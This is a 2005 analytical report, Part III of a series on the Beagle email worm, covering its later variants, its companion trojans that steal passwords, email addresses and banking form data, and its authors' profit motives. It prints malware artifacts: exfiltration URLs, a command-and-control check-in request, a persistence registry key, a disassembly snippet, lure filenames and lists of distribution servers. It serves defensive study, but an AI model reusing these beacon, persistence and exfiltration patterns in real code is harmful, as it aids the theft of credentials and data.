know the business. stop beagle's
run.
|
|
|
Year of the Beagle Download the PDF The Beagle Worm History Part III infectionvectors.com February 2005
Overview
This is the third part in a series concerning the history and effects of the Beagle worm.1 On January 18, 2004 antivirus companies around the world discovered the Beagle (aka Bagle) worm. In the year since its release, Beagle has had a major impact on the Internet. This report examines the first year of Beagle, the variants since Part 2 of this series, and the development of the Beagle “business strategy,” a plan that includes much more than mass email.
Throughout the yearlong life of the worm, Beagle’s authors have shown not only great technical abilities, but also disciplined process improvement and business skills. The Beagle releases have improved consistently, adding new routines and changing their external appearance. From its beginnings, analysts have believed it was built to create revenue.2 Although there is currently no way to quantify the income generated by the worm, Beagle appears to have a broad base of profit-generating pieces, from affording its writers the ability to lease spam relays to stealing bank account information.
As in the two previous reports, the Symantec nomenclature is used to identify variants unless noted otherwise.
Variations on a Theme
The Beagle worm of January 2005 is as much a success as a criminal web-based business as it is a successful virus. Although much different from their great grandfather, the Beagle.A that appeared in 2004, the latest incarnations of the code continue to provide examples of a well-defined method and focus (in Internet crime). Where the previous two parts of the Beagle History tried to describe the technical achievements of the worm (which this polymorphic worm continues to present), this portion examines the lessons to be learned from a leader in the nefarious web economy of spamming, phishing, and stealing passwords.3
Beagle.AR
In late September 2004, Beagle.AR appeared in the same way its predecessors did: as a broadly seeded worm arriving in thousands of inboxes. AR’s payload also resembles its recent cousins AP and AQ. Mitglieder is dropped onto victim machines and immediately attempts to reach out to nearly 150 sites and download a file named “ws.jpg.” No samples of this file were captured at the time of the worm’s release, as the sites listed in the code did not have it or were offline after AR was released. This should be no surprise to those following the history of Beagle; the author regularly tests worm functions and new features by releasing a variant that does not complete its routines. Beagle.AR, however, still posed a great threat to victim machines; the worm opens both TCP 81 and a random UDP port for remote connections.
Beagle.AU
Beagle.AU hit the Internet on October 29 of 2004, and showed a renewed interest in stopping the Windows XP security services (as August 2004’s AQ introduced). It also opens TCP 81, apparently with the single function of allowing remote execution of a local file. The worm copied itself to the local machine as “wingo.exe” (as well as wingo.exeopen & wingo.exeopenopen) to the Windows directory. On a Windows 9x/ME device, that directory is “Windows\System” (versus “Winnt\System32” for Windows 2000/NT or “Windows\System32” for XP) and the infection would look like this, note the icon used for this variant:
Beagle.AU resident on a Windows 9x Machine
Beagle.AV
The most widely seeded variant of the three released on October 29th, AV found itself in an elevated threat status on many antivirus vendors’ sites. AV used this seeding to hit more machines than the other two versions released on the same day combined. A look at the time period from October 2004 to January 2005 via F-Secure’s virus statistics page shows it as the fourth most reported virus.4 As of January 10, 2005, Symantec still had this variant rated at a risk level of 3 (out of 5), making it equal to the Sober variant released three weeks after AV and the Zafi variant released six weeks later. At the same time infection reports show Beagle variants continuing to compromise machines around the world at a high rate.5 This variant of the worm does not implement any new tricks and looks functionally equivalent to AU. Beagle.AV is coded to die after April 25, 2006.
Beagle.AW
October 29 also marked the release of AW. Using the same list of server addresses as AR, this variant attempts to retrieve “g.jpg” from the Internet. Again TCP 81 is opened. The only other difference from AU is the use of “bawindo.exe” as the worm’s file name on the local device.
Following the release of AW, a number of new Trojans (in the spirit of the Mitglieder software already distributed by Beagle) appeared on Beagle-infected devices. These were designed to steal additional information from victim machines as well as act as backdoors for new software installations. The applications are described in greater detail later in this report.
Releasing three variants on the same day is certainly not unusual for the Beagle creator. The use of multiple, very similar, versions of the code is one way to increase the likelihood that a particular variant will go undiscovered. A signature for one version of the code (which is often encrypted, specially packed, etc.) may miss another entirely even though the variant looks identical at first glance (and without time-intensive deconstruction of the program). It also increases the confusion surrounding a worm; releasing many versions of a worm simultaneously capitalizes on the discrepancies in naming conventions between antivirus vendors.
Beagle.AX
Released November 15, 2004, Beagle.AX represents a “full fledged” attempt to compromise a new base of computers. “Full fledged” in the sense that no routines appear to be tests for the future; everything included in the worm worked upon release. Moreover, it includes functions such as notification of each infection, which is absent from some previous iterations.
Beagle.AX displays the phony error message (“Can’t find a viewer…”) of previous versions, kills Netsky variants and security tools, opens a functioning relay port (TCP 2002), downloads additional worm code from the Internet (saving the file as “1.exe”), and then propagates (via file shares and SMTP). Beagle.AX also employs the use of image files to deliver the password for copies that are encrypted.
AX also retrieves a password stealer, LDPinch6, from the Internet. Additional information on this program is found in the next section. One other interesting inclusion at this point is the use of HTA files to launch the worm, which the author had not done since August of 2004 with the AP variant. AX brings back the verse from Beagle.Y:
In a difficult world In a nameless time I want to survive So, you will be mine!! -- Bagle Author, 29.04.04, Germany.
Possibly this is an indication that a previously released version of code was slightly modified for this distribution. The lines were also included in MyDoom.W (September 14, 2004), with slight modification, possibly pointing to common or related writers.7.
The following diagram outlines the basic routines of these related versions of Beagle and nearly all iterations, using AX as a guide for worm details (such as the Subject line of the email):
Beagle Installation Functions
AX found much success through its wide initial seeding. Although the Beagle authors would distribute new code through the AU-AX infections, this would be the last iteration of the worm for over two months.
Beagle.AY
The first variant of 2005, released on January 26, made a few cosmetic changes to the versions released in the fall. Most noticeable, AY changed the familiar list of filenames used when the worm replicated via unprotected share rather than mass email. Although the worm continued to use the same distribution servers of AX, the file it attempts to retrieve is now called “error.jpg.” This also serves as the registration of the infected box with the external server. The worm opens a backdoor on a random port above 2338. AY delivers email messages with simple subject lines and short message bodies (as is common for the Beagle author), and one of seven possible names (with an extension of CPL, COM, EXE, or SCR). The use of a simpler attachment scheme than previous worms and reliance on servers listed for nearly three months makes this version appear as a “test” or development iteration.
An email created by this slightly different-looking version would appear like this:
From: [spoofed from list harvested from victim] Subject: Registration is accepted Message Body: Before use read the help Attachment: wsd01.exe Example Beagle.AY Email
Beagle.AZ
Also released January 26, AZ looks functionally identical to AY. However, the author changed the way the worm terminates, coding the malware to stop running after a month or April 25, 2006, whichever comes first. This is controlled by a Registry entry that records the date of the initial infection:
HKEY_CURRENT_USER\Software\Microsoft\Params Riga = “[DATE INFO]”
Some type of termination date has been part of many variants; this is the first that stops functioning after a set time. AZ still attempts to terminate security software immediately, aiming at the connection sharing, firewall, and security center in Windows XP.
AZ lifts a random icon from the compromised device to use as its own when propagating. This serves as another means of obfuscating the worm to a user; there is no way to send out a general alert for the worm by saying, “Look for the ‘x’ icon,” in much the same way that the variable subject lines and message bodies do.
Beagle.BA
Released as a repacked version of AZ on January 27, 2005, BA represents another widely seeded variant. Repackaging extends the life of the code a little longer, requiring a new signature from antivirus companies to catch the new Beagle. At some point, it is worth considering, there must be a breaking point for the antivirus researchers; a number of independent variants of major worms that if released in a small enough window, would overwhelm the analysis and signature release process. If generic detection signatures were not possible (or possible within a short enough time frame), a writer such as the Beagle author may be able to infect boxes by “brute force” in the future.
The tactic has been used multiple times before by the authors and is just one of many that they use to ensure success, which they seem to have achieved. The idea that the Beagle authors have a business plan is explored in the next section, which continues to examine the applications they have distributed.
Refining the Business Plan
The initial suspicions about Beagle appear to be true: individuals seeking to profit from malware crafted the worm. That has been chronicled by multiple sources including the first two parts of this report.8 In many ways the Beagle history is a blueprint for web-based criminal success. The coder(s) crafted a well-conceived worm, used sound testing and distribution methods to hone the code’s routines, and then exploited the base of victims to deliver additional “products” which increase the profitability of the venture. With each Beagle iteration, the cost of deployment is reduced, the installation base grows larger, and generating a greater return for each new piece of malware is possible. This “viral economy of scale” can be better explained in the following brief table:
Beagle Business Functions
Beagle’s end game is still not completely known to the security world; there are multiple directions the authors could take with their code. However, the table above serves as a simple example of how well the venture has gone thus far. Not only has Beagle apparently met its initial objective (to establish anonymous spam relays), but it has also allowed the creators to expand their markets both horizontally and vertically (although not in the traditional business sense).
Beagle’s compromised machine base is used to generate revenue in two ways: 1) to increase the number of “products” available to the authors and, 2) to increase the potential profit on each machine infected. First, the authors have been able to use both the Beagle worm itself and the systems it compromises to push multiple types of malicious code around the world. New examples of this are described in the next section. Each of these programs is capable of harvesting different pieces of information (or “products” as each holds a resale value), from passwords to banking information, each of which holds profit potential. In addition, some code establishes relay points for providing a service (spam/phishing attempts) or delivering new applications; Mitglieder is a good example of this. This has allowed the authors to expand their business “horizontally,” or into new areas with various customers and victims.
Second, Beagle-infected machines can be used for multiple types of malware, sometimes at the same time. This functionality is delivered via the unending stream of Trojans that are available for download. The effort and expense in creating a virus like Beagle may seem low to those thinking only of the speed with which it appears such code is delivered, however, there is undoubtedly a significant investment of time in coding and testing the numerous incarnations of the worm. Re-using infected machines allows the authors to use the same compromised boxes for numerous ventures, ensuring that each infection’s return on investment is maximized, though only the authors themselves know exactly how well the model has worked up to this point.
One more interesting facet of the Trojan releases is that they are often weeks after the worm itself is distributed. This tactic is likely employed in hopes that researchers and security professionals downplay the severity of the virus; reducing the overall attention the respective version of Beagle receives. It also ensures that the Trojans are not subject to analysis in a timely manner. The expansion of the Beagle business plan is described in the next section which outlines a few of the Trojans discovered on infected machines and download points.
LDPinch
AX installs the password-stealer LDPinch on the victim machine (actually retrieved as “Pinch.exe” from the Internet), as was reported for much earlier variants in 2004. This version of LDPinch attempts to collect the following:
LDPinch Lifts: Name of the Infected Computer and its Domain POP3/IMAP servers used, usernames, and passwords Trillian usernames, passwords WS_FTP Settings Opera Mail Account Settings Mozilla Accounts
LDPinch Attempts to Steal Passwords Associated with: MS Outlook Account Manager Windows Commander ICQ Accounts Total Commander BatMail RimArts RAS Accounts CuteFTP AOL
Instant Messenger LDPinch Functions
Beagooz
In the previous portions of this report it was noted that although Beagle was clearly crafted with spamming interests in mind, no version of the worm lifted email addresses from an infected machine and delivered them to an outside source, something that a spammer would likely be interested in accomplishing. That officially changed approximately one week after the AU-AW variants were released. The phantom files they each attempted to retrieve became available on November 5, 2004. As could be guessed at this point, the Trojan, likely dubbed Beagooz because of the Registry value it creates (HKCU\Software\Firstzzz), harvested email addresses from affected machines and posted them to an external server. In fact, this is all that Beagooz does. Once the program has searched the hard disk, gathered the addresses, and sent them on their way it deletes itself (by way of crafting a small batch file which it executes).9
Beagooz connects to the following when uploading addresses:
http://www.domamil.cz/immo/_PSD/FLash/out.php?a=upl domain: domamil.cz nserver: ns.kraxnet.cz ns.kraxnet.com
217.11.237.145, Location: Czech Republic - Praha, Hlavni Mesto - Prague
Beagooz.B
Shortly after the release of Beagooz a similar Trojan began to surface (November 7, 2004). This version of the code remained virtually the same, just changing the Registry key (“Firstzzz1”) and the destination of the email addresses: canalj.net, registered to a French mailing address.
http://www.canalj.net/ctoiki/tkitoi/zidane/images/work/out.php?a=upl
194.117.214.46, Location: La Altagracia - Punta Cana
Beagooz.C
The next day (November 8, 2004), the third incarnation of the address-harvester appeared. The version uses the name “Firstzz3” in the same Registry key. The data is posted to a domain registered to a location in Lithuania, but with an IP address registered to a US company:
http://www.first-gallery.com/functions/out.php?a=upl
64.202.167.192 Location: United States - Scottsdale, Arizona
The Beagooz programs represent another shift in focus for the Beagle worm. Now, harvesting email addresses not only allows the current version of the worm to target new victims (as it still propagates to all discovered addresses), but also later versions (without the use of infected boxes – by simply plugging all of the stolen addresses into a mail server). This may be a response to better detection abilities and security tool use on client machines. The release of Windows XP SP2 provided additional warnings to users (via the Security Console) when their firewall or anti-virus software was disabled. Although Beagle variants do routinely target these services for termination, the lack of the monitoring icon (a small shield added to the System Tray) would prompt many users to check their system.
Furthermore, if there is profit in using infected boxes as spam relays then there is greater potential for profits by also selling the lists of email addresses harvested by the worm. Shortly after the release of Beagle.A analysts began reporting that the worm was clearly designed for relaying spam. Spam, although expensive and cumbersome for administrators to filter, is not necessarily a security problem in its own right. However, spam has gone from annoying to sinister very quickly. Spam tactics allow email to be the economical vessel for Trojans and scams of all kinds. The email traffic sent to Beagle-infected machines for mass relaying has included everything from advertisements for prescriptions through phishing attempts. In many ways, it is the natural evolution of Beagle’s “business;” the email address lists are a natural and necessary component of the final product (additional email copies) so profiting from the effort in creating them only makes sense.
Mitglieder Continued
In late November of 2004, additional variants of the Trojan known as Mitglieder began surfacing as part of the Beagle world. Mitglieder was dropped by other Trojans and could be retrieved from servers distributing Beagle components. Once the code is executed, Mitglieder (aka Small) reaches out and downloads the “engine” for email/file share propagation, or the Beagle worm proper.10 The Trojan can be used to download any type of application (such as the password stealer LDPinch) to infected boxes, allowing the author to modify programs, test/execute them, and remove them without detection.
Variant Release Additional Info. Mitglieder.A January 8, 2004 LDPinch download Mitglieder.B/.C January 20, 2004 discovered with Beagle.A Mitglieder.D/.E March 13, 2004 TCP 25555 & 20742 (respectively) Mitglieder.F/.G April 5, 2004 hard coded DNS Mitglieder.H April 7, 2004 TCP 14247 Mitglieder.I April 13, 2004 Mitglieder.J April 24, 2004 Tarno download Mitglieder.K May 13, 2004 attempts 4 downloads Mitglieder.L June 7, 2004 self-update Mitglieder.M July 22, 2004 Mitglieder.N/.O August 20, 2004 added full process kill list Mitglieder.BB (Panda) November 5, 2004 screenshot capability Small.MS (Trend) November 22, 2004 arrives as attachment Small.ZM (Trend) November 22, 2004 kills security software/dropped by MS Mitglieder.BF (Panda) December 7, 2004 s creenshots, password lifting Mitglieder.BG (Panda) January 5, 2005 Mitglieder Releases
Mitglieder (German for “members”) has always been around with Beagle, apparently the end game for the email relay and “update” system. The first incarnation of Mitglieder was discovered On January 8, 2004 (10 days prior to Beagle.A).11 As previously reported, this program appeared to be a spam relay, giving Beagle its initial use as a profit-generator.
Formglieder
During the research of the AX variant, another Trojan was found to be part of the download available on one of the servers listed in the code. The Trojan uses an encrypted URL (decrypted at runtime) as its connection point for additional applications. Later, this application was appropriately called “Formglieder” by antivirus vendors.12 Formglieder has many of the traits of other Beagle-author products: it creates a unique identifier (128 bit number) on the local machine, it regularly checks a web server for updates and additional software, and posts logs to an external site. It also harvests all data inputted into logon/banking “forms” online, hence the name. The installation routine places a copy of the worm in the Windows directory (as “winhlp.exe”), executes that copy, and then creates an automatic startup value in the Registry:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run winhlp.exe "C:\WINDOWS\winhlp.exe"
It then creates the following key/value that holds the unique identifier for that compromised machine (where the UID is randomly generated):
HKEY_LOCAL_MACHINE\Software\Microsoft\UserData UID "{77A9F1C0-639B-13D9-89B8-00A00D664298}"
The URL that is the destination for the “update check” and stolen data is:
www.claus.drehteile-rieche.de
This domain has the address 195.20.225.21 associated with it at the time of discovery and uses ns.schlund.de for name resolution.
Formglieder is yet another extension of the Beagle “business plan,” which already includes delivering spam/phishing attempts, lifting email addresses, and stealing passwords. This Trojan lifts data of a special kind: online banking information. Formglieder is coded to only capture information from Internet Explorer windows that show any of the followings strings:
In addition, if the Internet Explorer window contains the string:
e-gold.com/acct/balance.asp
Formglieder captures all the data in the window and forwards it on to the compiling server. As mentioned above, the Trojan also attempts to “check in” with its parent server periodically. It does this with a request that looks like the following:
GET /images/b64.php?p={77A9F1C0-639B-13D9-89B8-00A00D664298} HTTP/1.1
What deserves attention is the use of the unique identifier in the request, allowing the author to catalog the devices that have been compromised. This has been a staple of Beagle’s infections since early in its development. The catalog could include the computer’s IP address, names of users on the device, password hashes, what software resides on the machines, etc. Postings to the server contain any values that exist in the installed software and username/password keys for multiple network applications, including Outlook, Outlook Express, FTP, POP3, IMAP, and others.
As mentioned in Part I of this series, cataloguing machines is useful for a number of reasons. By having the IP address (at least a NAT’ed address), the authors can lookup where their victims are located (for example, a bank, a military base, Fortune 500 company, etc.) and tailor the Trojan appropriately. As of yet, the evidence points to the Beagle writers using the worm in a much broader fashion, without pinpointing specific targets. However, there is little means of verifying that it has not been done.
Test, yep.
From the outset, the focus of these reports has been the development of the worm in terms of its technical and non-technical innovation. Beagle has shown remarkable improvements since its first release in January of 2004. The bulk of the changes have been documented in the virus research literature and the two previous portions of this report.
Although new releases of the “classic” Beagle worm may be used to rebuild an army of compromised machines, possibly the world has witnessed the final evolution of this malware. The initial three-month period (January 18 – April 30, 2004) was concerned with honing the base functionality of Beagle, avoiding detection, and building the base of compromised boxes. The next phase, loosely the next 6 months, focused on shifting the “soft” pieces of the virus, namely the message body and subject lines as well as how the worm is actually delivered to a machine. The summer of 2004 witnessed the attachment give way to the web-delivered Beagles. This recent evolution has been concerned with delivering very focused pieces of malware to devices, presumably with the intention of generating profit. Numerous droppers have been used to posit the worm on machines around the globe, further confusing the issue and making general alerts difficult.13
Some of the most calculated moves on the author’s part may be the release dates for the malware. As previously noted, leaving weeks between the distribution of a worm and the posting of the applications it is supposed to retrieve helped reduce the attention the respective worms received. The release of the Beagooz and Formglieder Trojans after months of perfecting a mass mailer and infecting thousands of hosts was likely well thought out. Although the evolution of this worm may be over soon, its lessons will extend to malware writers for years to come.
Getting the Show on the Road
The use of email to deliver the Beagle payload has proven to be quite successful. The coder or coders responsible for these worms seem more than talented enough to have employed the ubiquitous RPC DCOM exploits or LSASS overflow from 2003 and 2004 respectively to mobilize a virus, but instead stuck with SMTP for at least a piece of all the Beagle distributions.
Many analysts have said that the rise of bot nets is the trend to watch in malware. In addition, the mass mailer has been relegated to “on the decline” status as it is believed that SMTP worms will begin to die off like Macro-viruses.15 Although bot nets such as Agobot pose a significant threat to the Internet, the idea that they compete with mass mailers for victims is a false dichotomy. Mass mail is perfectly suited for delivering the application that turns a home PC into a slave. Beagle has proven this time and time again; although not the first thought in most people’s minds when “bot net” is mentioned, Beagle produced one of the largest such armies in 2004. Where other worms are fighting the increased use of firewalls and security updates (especially since XP SP2 has been released), Beagle continues to slip its encrypted ZIP attachment into the inboxes of users everywhere.
The use of email to deliver malware works for many reasons, although the lack of user awareness tops the list. A user that may be very skeptical of traditional phishing attacks that employ poor grammar in an effort to extract banking information is still likely to look at an attachment from someone they “know” in a spoofed “From” field.
While the delivery mechanism for bots may be debated as a technical issue, continued profitability will determine the path that venture like Beagle take in the future. If mass mail becomes inefficient and expensive it will likely be a result of tighter SMTP controls and authentication mechanisms. These would hurt email business as a whole, making spamming and phishing difficult. Some inroads have been made; email filers and scanners have helped reduce the amount of spam that users see on their desktops. Beagle’s developers have already responded, making their flagship product capable of generating profits in multiple areas, not just spam. As explored by the first two parts of this series, Beagle’s authors have shown dedication to improving the worm code, in both technical achievement and good processes.15
The final lesson from Beagle’s year is that profitable malware can be constructed, deployed, and managed as well as profitable security software. The beginning of this series included, many virus analyses focus on the technical magic of a worm and overlook the simple, methodical precision of an author that is motivated by revenue. These authors are less likely to make the mistakes that a careless writer who is seeking attention makes.
As is mentioned elsewhere in this document, the Beagle authors took the threat of Netsky quite seriously and built multiple layers of defense into the worm (possibly better considered as layers of “offense” based on the actions taken) to prevent the competing malware from hurting profits. Beagle has treated the security community in the same fashion, attacking the software that is designed to protect machines and targeting the weakest link of most security perimeters: user awareness. A fitting summary of the worm thus far and the most telling aspect of Beagle’s “business” application comes from the coders themselves, who wrote (to the Netsky author in Beagle.J) the following in March of 2004:
“… don't ruine our bussiness, wanna start a war ?"
Additional Information for the Curious
Beagle Function Development
This was introduced in Part I and is updated again for this report:
.A EXE attachment Base Function Opened backdoor Base Function Downloaded additional code Base Function
.B Generated Unique ID Enhanced control Submitted ID/port/address info to author Enhanced control Tested remote control abilities Improved reliability Changed backdoor port Base Function
.C Added 33 subject lines Social Engineering Disabled security products Hampered Detection DNS server added Improved reliability Injected into explorer.exe Hampered Detection
.D Changed mutex name Hampered Detection
.E Added text line Social Engineering Changed Compression mechanism Hampered Detection Changed filenames/Registry entries Hampered Detection
.F Inserts random “junk” data Hampered Detection Eliminates use of hash/checksums Hampered Detection Large shell changes – subjects, attachments, etc. Social Engineering Encrypted payload occasionally Hampered Detection Added infection vector – “shar” Extended Life/Reach
.G Always sends encrypted payload Extended Life/Reach Hampered Detection
.H Changed shell – icon different Extended Life/Reach
.I Changed filenames Extended Life/Reach
.J Completely revamped shell Social Engineering Extended Life/Reach
.K New filenames/Reg values Hampered Detection
.L Installs trojan - leverages tool: Mitglieder Base Function Utilizing pre-built machine army to disperse Base Function
.M Acts solely as Trojan – changes character Extends Life/Reach
.M(mm) Changed install routine Hampered Detection EXE infection Base Function Added compression – RAR Base Function Password as graphic Hampered Detection
.N File size increased Hampered Detection
.O Changed filenames/Registry entries Hampered Detection
.Q New vector – only require opening message Base Function Modular infection sequence Base Function Hampered Detection
.R-.T Changes filenames, etc. Extends Life/Reach
.U-.V No subjects, messages-covers with legitimate app. Hampered Detection .W-.X Hidden Trojan Hampered Detection Email relay Base Function Updates/Commands from compromised hosts Base/Detection Netsky Mutex Spawning Extends Life
.Y Dropped Source Code Hampers Prosecution
.Z-.AA Shifted Compression Mechanism Hampered Detection
.AB Widespread Initial Seeding Extends Life/Reach Base Function
.AC-.AH Shifted Compression Mechanism Hampered Detection Returned to Ciphered ZIPs Hampered Detection
.AO Hidden EXE (within compressed folder) Hampered Detection Downloads Worm Code from Internet Base Function Regular Update Period Base Function
.AP Changed Subject/Attachment Names Hampered Detection .AQ Stops Services Hampered Detection Regular Update Period Shortened Base Function
.AR Opens TCP 81 & Random UDP port Base Function
.AU-.AW Stops Windows Security Services Hampered Detection Download Additional Trojans Extend Functionality Base Function
.AX Compilation of Many Successful Functions Hampered Detection
.AY Changed Share Filenames Extend Functionality
.AZ Terminates After One Month Hampered Detection Random Icons Hampered Detection
.BA Repackaged Earlier Variant Hampered Detection
Beagooz.A-C Retrieve Email Addresses Base Function
Formglieder Steals PC and Bank Account Data Base Function
MyDoom Similarities/Tangent 2 on “In a difficult world” verse
MyDoom.W actually dropped a text file outlining the functions of the worm. Included in this file, about_mydoom.txt, is the following:
In a difficult world In a nameless time I want to survive So, you will be mine!!,second author
In Part II of this series, it was noted that a rock song with three parts, “In a Nameless Time,” by Rage (1995) was the only public reference discovered for this verse. The inclusion with MyDoom would mark the 2nd time the verse was discovered in a virus, with Beagle.AX being the third.
MyDoom has practical similarities to Beagle as well. Beyond the obvious (both are mass mailers, open backdoors, utilize Mitglieder16, etc.), both download additional applications that are refined as much as the worms themselves. During late 2004, MyDoom presented infected boxes with a pair of Trojans, Nemog and Sykel. Sykel exploits the LSASS vulnerability (MS04-011) to propagate. Once running on a box, Sykel attempts to download MyDoom and Nemog.
Nemog allows the author to add links to a Favorites file, change the local host’s IE start page, connect to various IRC channels, and harvest configuration details from the infected machine. The program contains a routine to generate fake email accounts for use in relayed email, undoubtedly for spamming purposes. The code allows for email relaying, killing antivirus/security software, and lifting local host information from the infected machine. In summary, it is a Trojan that attempts many of the same functions that Mitglieder does. Although that is a long way from tying the two worms together, these two worms do show a similarity in the business practices.
Formglieder Details
During the analysis of this Trojan, one additional test that was not documented in the paper was completed: executing the packed and unpacked versions of the code. The Trojan is compressed with UPX. If the unpacked version is executed, an unpacked copy appears in the Windows directory. If the packed version is executed, a packed copy is made. This simply indicates that the Trojan does keep a copy to “drop” nor does it contain a copy of UPX; nothing earth shattering.
The Formglieder initial connection to its parent looks like this:
GET /images/b64.php?p={77A9F1C0-639B-13D9-89B8-00A00D664298} HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Host: www.claus.drehteile-rieche.de Connection: Keep-Alive
HTTP/1.1 200 OK Date: Thu, 13 Jan 2005 15:01:19 GMT Server: Apache/1.3.29 (Unix) X-Powered-By:
PHP/4.3.10 Keep-Alive: timeout=2, max=200 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html
0
Formglieder retrieves the usernames, email addresses, passwords, and installed applications on a compromised machine through various calls to the local Registry. One such routine, used to extract a list of applications from the “Uninstall” key (which is generally a good indication of what is installed on a Windows machine) is shown below:
004040BF |. 68 09634000 PUSH WINHLP.00406309 ; ASCII "Installed apps:" 004040C4 |. E8 6BD0FFFF CALL WINHLP.00401134 004040C9 |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 004040CC |. 50 PUSH EAX ; /pHandle 004040CD |. 68 6D624000 PUSH WINHLP.0040626D ; |Subkey = "SOFTWARE\Microsoft\Windows \CurrentVersion\Uninstall" 004040D2 |. 68 02000080 PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE 004040D7 |. E8 6A0A0000 CALL <JMP.&advapi32.RegOpenKeyA> ; \RegOpenKeyA
The posted information is formatted with a short tag (such as “Installed apps:”) above and then a listing of the data found in the key. And it forms capture reports for the given URL strings in a modestly formatted summary (from a simple strings search):
00004BC9 004063C9 0 (!) URL: 00004BD3 004063D3 0 Form action: 00004BE1 004063E1 0 Form method: 00004BEF 004063EF 0 --------------------------------------------------------------- 00004C3F 0040643F 0 reset
The Familiar Set of Filenames Used for “shar” Directories
Microsoft Office 2003 Crack, Working!.exe Microsoft Windows XP, WinXP Crack, working Keygen.exe Microsoft Office XP working Crack, Keygen.exe Porno, sex, oral, anal cool, awesome!!.exe Porno Screensaver.scr Serials.txt.exe KAV 5.0 Kaspersky Antivirus 5.0 Porno pics arhive, xxx.exe Windows Sourcecode update.doc.exe Ahead Nero 7.exe Windown Longhorn Beta Leak.exe Opera 8 New!.exe XXX hardcore images.exe WinAmp 6 New!.exe WinAmp 5 Pro Keygen Crack Update.exe Adobe Photoshop 9 full.exe Matrix 3 Revolution English Subtitles.exe ACDSee 9.exe
This list was the only one used until the first variant of 2005 was released, which changed the filenames to:
1.exe 10.exe 2.exe 3.exe 4.exe 5.scr 6.exe 7.exe 8.exe 9.exe ACDSee 9.exe Adobe Photoshop 9 full.exe Ahead Nero 7.exe Matrix 3 Revolution English Subtitles.exe Opera 8 New!.exe WinAmp 5 Pro Keygen Crack Update.exe WinAmp 6 New!.exe Windown Longhorn Beta Leak.exe XXX hardcore images.exe
Servers Used to Compile Stolen Data
CANALJ.NET
inetnum: 194.117.214.0 - 194.117.215.255 netname: MGN-INTERACT-FR descr: Interact systemes country: FR admin-c: FRMO1-RIPE tech-c: MGN16-RIPE rev-srv: ns1.mgn.net rev-srv: ns2.mgn.net status: ASSIGNED PA notify: ****@mgn.net mnt-by: MGN-MNT changed: ***@mgn.net 20020222 source: RIPE
FIRST_GALLERY.COM
OrgName: Go Daddy Software, Inc. OrgID: GDS-31 Address: 14455 N Hayden Road Address: Suite 226 City: Scottsdale StateProv: AZ PostalCode: 85260 Country: US
DREHTEILE-RIECHE.DE
domain: drehteile-rieche.de descr: Rieche-Industriebedarf descr: Hubertusanlage 24 descr: D-63150 Heusenstamm descr: Germany nserver: ns.schlund.de nserver: ns2.schlund.de status: connect changed: 2003-08-17T13:40:17+0200 source: DENIC
Grudge Matches
Part II aimed at the new anti-Beagle routines since the Netsky author’s arrest; several pieces of malware targeted Beagle processes. None of those worms made special impact on the Internet. However, the “war” between Netsky and Beagle in early 2004 seems to have had an impact on many other authors looking to get into the mix. One worm, released in December of 2004, named Maslan (another mass mailer) made the following statement that included the Beagle author:
-{ Hah… MyDoom, Bagle, etc… since then you do not have future more! }-
Also interesting is the continued use of the Beagle backdoor by bots built with the Agobot/Phatbot code.17 This entry point onto an infected machine is included with numerous variants of these bots through the writing of this report. In addition, a number of viruses dropped the Beagle worm, including Norat and Kriz.
Lest anyone think this was removed from the code, the process termination and mutex initiation is still present in the latter versions of the worm, this is a testament to the phenomenal success of the Netsky variants, notably Netsky.P:
____--->>>>U<<<<--____ _-oO]xX|-S-k-y-N-e-t-|Xx[Oo-_ _-oOaxX|-+S+-+k+-+y+-+N+-+e+-+t+-|XxKOo-_ [SkyNet.cz]SystemsMutex AdmSkynetJklS003 D'r'o'p'p'e'd'S'k'y'N'e't' MuXxXxTENYKSDesignedAsTheFollowerOfSkynet-D
Later variants started just two mutexes:
_-oO]xX|-S-k-y-N-e-t-|Xx[Oo-_ MuXxXxTENYKSDesignedAsTheFollowerOfSkynet-D
Which were initially tied to Netsky.P and Netsky.AE/AA respectively. They are now created by vastly more Beagle variants than Netsky versions.
Web Servers Used by AU-AW
www.24-7-transportation.com www.jhaforpresident.7p.com www.DarrkSydebaby.com www.jimvann.com www.FritoPie.NET www.jldr.ca www.adhdtests.com www.justrepublicans.com www.aegee.org www.kencorbett.com www.aimcenter.net www.knicks.nl www.alupass.lu www.kps4parents.com www.amanit.ru www.kradtraining.de www.andara.com www.kranenberg.de www.angelartsanctuary.com www.lasermach.com www.anthonyflanagan.com www.leonhendrix.com www.approved1stmortgage.com www.magicbottle.com.tw www.argontech.net www.mass-i.kiev.ua www.asianfestival.nl www.mepbisu.de www.atlantisteste.hpg.com.br www.mepmh.de www.aviation-center.de www.metal.pl www.bbsh.org www.mexis.com www.bga-gsm.ru www.mongolische-renner.de www.boneheadmusic.com www.mtfdesign.com www.bottombouncer.com www.oboe-online.com www.bradster.com www.ohiolimo.com www.buddyboymusic.com www.onepositiveplace.org www.bueroservice-it.de www.oohlala-kirkland.com www.calderwoodinn.com www.orari.net www.capri-frames.de www.pankration.com www.celula.com.mx www.pe-sh.com www.ceskyhosting.cz www.pfadfinder-leobersdorf.com www.chinasenfa.com www.pipni.cz www.cntv.info www.polizeimotorrad.de www.compsolutionstore.com www.programmierung2000.de www.coolfreepages.com www.pyrlandia-boogie.pl www.corpsite.com www.raecoinc.com www.couponcapital.net www.realgps.com www.cpc.adv.br www.redlightpictures.com www.crystalrose.ca www.reliance-yachts.com www.cscliberec.cz www.relocationflorida.com www.curtmarsh.com www.rentalstation.com www.customloyal.com www.rieraquadros.com.br www.deadrobot.com www.scanex-medical.fi www.dontbeaweekendparent.com www.sea.bz.it www.dragcar.com www.selu.edu www.ecofotos.com.br www.sigi.lu www.elenalazar.com www.sljinc.com www.ellarouge.com.au www.smacgreetings.com www.esperanzaparalafamilia.com www.soloconsulting.com www.eurostavba.sk www.spadochron.pl www.everett.wednet.edu www.srg-neuburg.de www.fcpages.com www.ssmifc.ca www.featech.com www.sugardas.lt www.fepese.ufsc.br www.sunassetholdings.com www.firstnightoceancounty.org www.szantomierz.art.pl www.flashcorp.com www.the-fabulous-lions.de www.fleigutaetscher.ch www.tivogoddess.com www.fludir.is www.tkd2xcell.com www.freeservers.com www.topko.sk www.gamp.pl 